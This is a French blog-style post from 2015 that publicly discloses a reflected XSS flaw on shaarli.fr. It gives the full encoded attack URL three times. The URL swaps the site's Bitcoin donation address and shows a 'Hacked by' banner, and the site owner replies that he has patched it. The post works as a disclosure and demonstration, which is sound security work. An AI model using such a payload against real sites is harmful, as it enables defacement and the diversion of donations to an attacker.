Remplacer l'étrange adresse Bitcoin de shaarli.fr via une attaque XSS CROSS_SCRIPT, et encaisser le mega-pactole.
mardi 7 juillet 2015 à 01:49KraZhtest - Liens utiles - C'est le bordel 07/07/2015
Rââa©
Désolé!
Le lien est cassé une fois sur shaarli.fr. le voici cliquable:
{code
https://www.shaarli.fr/index.php?q=%22%3Cscript%3E%3Cscript%3Edocument.getElementsByTagName%28%22body%22%29[0].style.background=%27yellow%27;$%28%27h1.show-for-medium-up%27%29.html%28$%28%27h1.show-for-medium-up%27%29.html%28%29.replace%28/1EDwkGM6gCBn/,%27SALUT_C_NICO%E2%9D%A4%E2%9D%A4%27%29%29;%3C/script%3E%3C/script%3E%3Cp%20style=%27font-size:2em%27%3E%3Ch1%3E%E2%9D%A4Hacked%20by%20Nico_KraZhtest@%3Ca%20href=%27user23.net/links/?%27%3Euser23.net%3C/a%3E%3Cimg%20src=%27//i.imgur.com/PpIFlmW.gif%27/%3E%3C/h1%3E%3Ch4%3ELes%20failles%20XSS%20sont%20assez%20communes,%20%C3%A7a%20se%20joue%20%C3%A0%20tr%C3%A8s%20peu%20de%20choses!%3Cbr%3EC%27est%20le%20plus%20souvent%20rigolo!%3Cbr%3EDans%20certains%20cas%20comme%20ici%20sur%20shaarli.fr%20depuis%20peu,%20il%20y%20a%20une%20adresse%20Bitcoin,%20l%C3%A0-haut%20pour%20les%20dons^%3Cbr%3EDu%20javascript%20forc%C3%A9%20dans%20l%27url%20%28XSS,cross-scripting%29%20permet%20de%20changer%20les%20%C3%A9l%C3%A9ments%20%C3%A0%20la%20vol%C3%A9e.%3Cbr%3EComme%20sur%20cette%20page,%20les%20premiers%20caract%C3%A8res%20de%20l%27adresse%20Bitcoin%20sont%20remplac%C3%A9es%20par%20%22SALUT_C_NICO%E2%9D%A4%E2%9D%A4%22%3C/p%3EBien%20que%20ce%20soit%20un%20risque%20limit%C3%A9,%20un%20vilain%20pirate%20pourrait%20donc%20changer%20l%27adresse%20Bitcoin%20par%20url%20et%20encaisser%20tous%20les%20dons%20qui%20suivent%20ces%20liens.%3Cbr%3E%3Cbr%3EJ%27ai%20h%C3%A9sit%C3%A9%20%C3%A0%20publier%20ce%20message%20sous%20cette%20forme,%20bon%20voil%C3%A0,%20le%20risque%20est%20relativement%20limit%C3%A9.%20%20Un%20l%C3%A9ger%20petit%20probl%C3%A8me%20suppl%C3%A9mentaire%20pourrait%20laisser%20%C3%A9xecuter%20du%20code%20php%20dans%20l%27url,%20ce%20n%27est%20pas%20le%20cas%20ici%20directement.%20Pardon%20DM%20si%20cette%20forme%20de%20retour%20de%20bugs%20t%27etonnes%20un%20peu.%20%3Cbr%3E%3Cbr%3EShaarmicalement!%20%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C%27%27%20Aller%20sinon%20cherche%20bon%20boulot%20dans%20le%20php/js/css/linux/s%C3%A9curit%C3%A9%28..%29%20r%C3%A9gion%20Grenobloise,%20ou%20pire.%20Oui,%20depuis%20une%20faille%20XSS!%20;%29%3Cbr%3EEventuellement,%20croisez%20la%20requ%C3%AAte!
code}
Screenshot: {pic http://i.imgur.com/jiS0m9v.png pic}
Firefox*
Désolé!
Le lien est cassé une fois sur shaarli.fr. le voici cliquable:
{code
https://www.shaarli.fr/index.php?q=%22%3Cscript%3E%3Cscript%3Edocument.getElementsByTagName%28%22body%22%29[0].style.background=%27yellow%27;$%28%27h1.show-for-medium-up%27%29.html%28$%28%27h1.show-for-medium-up%27%29.html%28%29.replace%28/1EDwkGM6gCBn/,%27SALUT_C_NICO%E2%9D%A4%E2%9D%A4%27%29%29;%3C/script%3E%3C/script%3E%3Cp%20style=%27font-size:2em%27%3E%3Ch1%3E%E2%9D%A4Hacked%20by%20Nico_KraZhtest@%3Ca%20href=%27user23.net/links/?%27%3Euser23.net%3C/a%3E%3Cimg%20src=%27//i.imgur.com/PpIFlmW.gif%27/%3E%3C/h1%3E%3Ch4%3ELes%20failles%20XSS%20sont%20assez%20communes,%20%C3%A7a%20se%20joue%20%C3%A0%20tr%C3%A8s%20peu%20de%20choses!%3Cbr%3EC%27est%20le%20plus%20souvent%20rigolo!%3Cbr%3EDans%20certains%20cas%20comme%20ici%20sur%20shaarli.fr%20depuis%20peu,%20il%20y%20a%20une%20adresse%20Bitcoin,%20l%C3%A0-haut%20pour%20les%20dons^%3Cbr%3EDu%20javascript%20forc%C3%A9%20dans%20l%27url%20%28XSS,cross-scripting%29%20permet%20de%20changer%20les%20%C3%A9l%C3%A9ments%20%C3%A0%20la%20vol%C3%A9e.%3Cbr%3EComme%20sur%20cette%20page,%20les%20premiers%20caract%C3%A8res%20de%20l%27adresse%20Bitcoin%20sont%20remplac%C3%A9es%20par%20%22SALUT_C_NICO%E2%9D%A4%E2%9D%A4%22%3C/p%3EBien%20que%20ce%20soit%20un%20risque%20limit%C3%A9,%20un%20vilain%20pirate%20pourrait%20donc%20changer%20l%27adresse%20Bitcoin%20par%20url%20et%20encaisser%20tous%20les%20dons%20qui%20suivent%20ces%20liens.%3Cbr%3E%3Cbr%3EJ%27ai%20h%C3%A9sit%C3%A9%20%C3%A0%20publier%20ce%20message%20sous%20cette%20forme,%20bon%20voil%C3%A0,%20le%20risque%20est%20relativement%20limit%C3%A9.%20%20Un%20l%C3%A9ger%20petit%20probl%C3%A8me%20suppl%C3%A9mentaire%20pourrait%20laisser%20%C3%A9xecuter%20du%20code%20php%20dans%20l%27url,%20ce%20n%27est%20pas%20le%20cas%20ici%20directement.%20Pardon%20DM%20si%20cette%20forme%20de%20retour%20de%20bugs%20t%27etonnes%20un%20peu.%20%3Cbr%3E%3Cbr%3EShaarmicalement!%20%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C%27%27%20Aller%20sinon%20cherche%20bon%20boulot%20dans%20le%20php/js/css/linux/s%C3%A9curit%C3%A9%28..%29%20r%C3%A9gion%20Grenobloise,%20ou%20pire.%20Oui,%20depuis%20une%20faille%20XSS!%20;%29%3Cbr%3EEventuellement,%20croisez%20la%20requ%C3%AAte!
![https://www.shaarli.fr/index.php?q=%22%3Cscript%3E%3Cscript%3Edocument.getElementsByTagName%28%22body%22%29[0].style.background=%27yellow%27;$%28%27h1.show-for-medium-up%27%29.html%28$%28%27h1.show-for-medium-up%27%29.html%28%29.replace%28/1EDwkGM6gCBn/,%27SALUT_C_NICO%E2%9D%A4%E2%9D%A4%27%29%29;%3C/script%3E%3C/script%3E%3Cp%20style=%27font-size:2em%27%3E%3Ch1%3E%E2%9D%A4Hacked%20by%20Nico_KraZhtest@%3Ca%20href=%27user23.net/links/?%27%3Euser23.net%3C/a%3E%3Cimg%20src=%27//i.imgur.com/PpIFlmW.gif%27/%3E%3C/h1%3E%3Ch4%3ELes%20failles%20XSS%20sont%20assez%20communes,%20%C3%A7a%20se%20joue%20%C3%A0%20tr%C3%A8s%20peu%20de%20choses!%3Cbr%3EC%27est%20le%20plus%20souvent%20rigolo!%3Cbr%3EDans%20certains%20cas%20comme%20ici%20sur%20shaarli.fr%20depuis%20peu,%20il%20y%20a%20une%20adresse%20Bitcoin,%20l%C3%A0-haut%20pour%20les%20dons^%3Cbr%3EDu%20javascript%20forc%C3%A9%20dans%20l%27url%20%28XSS,cross-scripting%29%20permet%20de%20changer%20les%20%C3%A9l%C3%A9ments%20%C3%A0%20la%20vol%C3%A9e.%3Cbr%3EComme%20sur%20cette%20page,%20les%20premiers%20caract%C3%A8res%20de%20l%27adresse%20Bitcoin%20sont%20remplac%C3%A9es%20par%20%22SALUT_C_NICO%E2%9D%A4%E2%9D%A4%22%3C/p%3EBien%20que%20ce%20soit%20un%20risque%20limit%C3%A9,%20un%20vilain%20pirate%20pourrait%20donc%20changer%20l%27adresse%20Bitcoin%20par%20url%20et%20encaisser%20tous%20les%20dons%20qui%20suivent%20ces%20liens.%3Cbr%3E%3Cbr%3EJ%27ai%20h%C3%A9sit%C3%A9%20%C3%A0%20publier%20ce%20message%20sous%20cette%20forme,%20bon%20voil%C3%A0,%20le%20risque%20est%20relativement%20limit%C3%A9.%20%20Un%20l%C3%A9ger%20petit%20probl%C3%A8me%20suppl%C3%A9mentaire%20pourrait%20laisser%20%C3%A9xecuter%20du%20code%20php%20dans%20l%27url,%20ce%20n%27est%20pas%20le%20cas%20ici%20directement.%20Pardon%20DM%20si%20cette%20forme%20de%20retour%20de%20bugs%20t%27etonnes%20un%20peu.%20%3Cbr%3E%3Cbr%3EShaarmicalement!%20%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C%27%27%20Aller%20sinon%20cherche%20bon%20boulot%20dans%20le%20php/js/css/linux/s%C3%A9curit%C3%A9%28..%29%20r%C3%A9gion%20Grenobloise,%20ou%20pire.%20Oui,%20depuis%20une%20faille%20XSS!%20;%29%3Cbr%3EEventuellement,%20croisez%20la%20requ%C3%AAte](https://www.shaarli.fr/index.php?q=%22%3Cscript%3E%3Cscript%3Edocument.getElementsByTagName%28%22body%22%29[0].style.background=%27yellow%27;$%28%27h1.show-for-medium-up%27%29.html%28$%28%27h1.show-for-medium-up%27%29.html%28%29.replace%28/1EDwkGM6gCBn/,%27SALUT_C_NICO%E2%9D%A4%E2%9D%A4%27%29%29;%3C/script%3E%3C/script%3E%3Cp%20style=%27font-size:2em%27%3E%3Ch1%3E%E2%9D%A4Hacked%20by%20Nico_KraZhtest@%3Ca%20href=%27user23.net/links/?%27%3Euser23.net%3C/a%3E%3Cimg%20src=%27//i.imgur.com/PpIFlmW.gif%27/%3E%3C/h1%3E%3Ch4%3ELes%20failles%20XSS%20sont%20assez%20communes,%20%C3%A7a%20se%20joue%20%C3%A0%20tr%C3%A8s%20peu%20de%20choses!%3Cbr%3EC%27est%20le%20plus%20souvent%20rigolo!%3Cbr%3EDans%20certains%20cas%20comme%20ici%20sur%20shaarli.fr%20depuis%20peu,%20il%20y%20a%20une%20adresse%20Bitcoin,%20l%C3%A0-haut%20pour%20les%20dons^%3Cbr%3EDu%20javascript%20forc%C3%A9%20dans%20l%27url%20%28XSS,cross-scripting%29%20permet%20de%20changer%20les%20%C3%A9l%C3%A9ments%20%C3%A0%20la%20vol%C3%A9e.%3Cbr%3EComme%20sur%20cette%20page,%20les%20premiers%20caract%C3%A8res%20de%20l%27adresse%20Bitcoin%20sont%20remplac%C3%A9es%20par%20%22SALUT_C_NICO%E2%9D%A4%E2%9D%A4%22%3C/p%3EBien%20que%20ce%20soit%20un%20risque%20limit%C3%A9,%20un%20vilain%20pirate%20pourrait%20donc%20changer%20l%27adresse%20Bitcoin%20par%20url%20et%20encaisser%20tous%20les%20dons%20qui%20suivent%20ces%20liens.%3Cbr%3E%3Cbr%3EJ%27ai%20h%C3%A9sit%C3%A9%20%C3%A0%20publier%20ce%20message%20sous%20cette%20forme,%20bon%20voil%C3%A0,%20le%20risque%20est%20relativement%20limit%C3%A9.%20%20Un%20l%C3%A9ger%20petit%20probl%C3%A8me%20suppl%C3%A9mentaire%20pourrait%20laisser%20%C3%A9xecuter%20du%20code%20php%20dans%20l%27url,%20ce%20n%27est%20pas%20le%20cas%20ici%20directement.%20Pardon%20DM%20si%20cette%20forme%20de%20retour%20de%20bugs%20t%27etonnes%20un%20peu.%20%3Cbr%3E%3Cbr%3EShaarmicalement!%20%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C%27%27%20Aller%20sinon%20cherche%20bon%20boulot%20dans%20le%20php/js/css/linux/s%C3%A9curit%C3%A9%28..%29%20r%C3%A9gion%20Grenobloise,%20ou%20pire.%20Oui,%20depuis%20une%20faille%20XSS!%20;%29%3Cbr%3EEventuellement,%20croisez%20la%20requ%C3%AAte){kind=link}
code}
Screenshot: {pic http://i.imgur.com/jiS0m9v.png pic}
Firefox*
Shaarlo 07/07/2015
Merci pour la démo ! Je viens de corriger en urgence plusieurs entrées. Je pense qu'il y en a encore d'autres mais je dois faire un peu de déplacement de code pour le faire + proprement...
Sur le site web de ma boite, j'ai détecté une faille encore plus vicieuse car le paramètre de l'url est codé en base64 donc côté utilisateur, c'est encore moins évident de le détecter :p
NB : je te rassure, même en changeant l'adresse bitcoin, tu n'aurais pas été très riche !
(Permalink)
Sur le site web de ma boite, j'ai détecté une faille encore plus vicieuse car le paramètre de l'url est codé en base64 donc côté utilisateur, c'est encore moins évident de le détecter :p
NB : je te rassure, même en changeant l'adresse bitcoin, tu n'aurais pas été très riche !
(Permalink)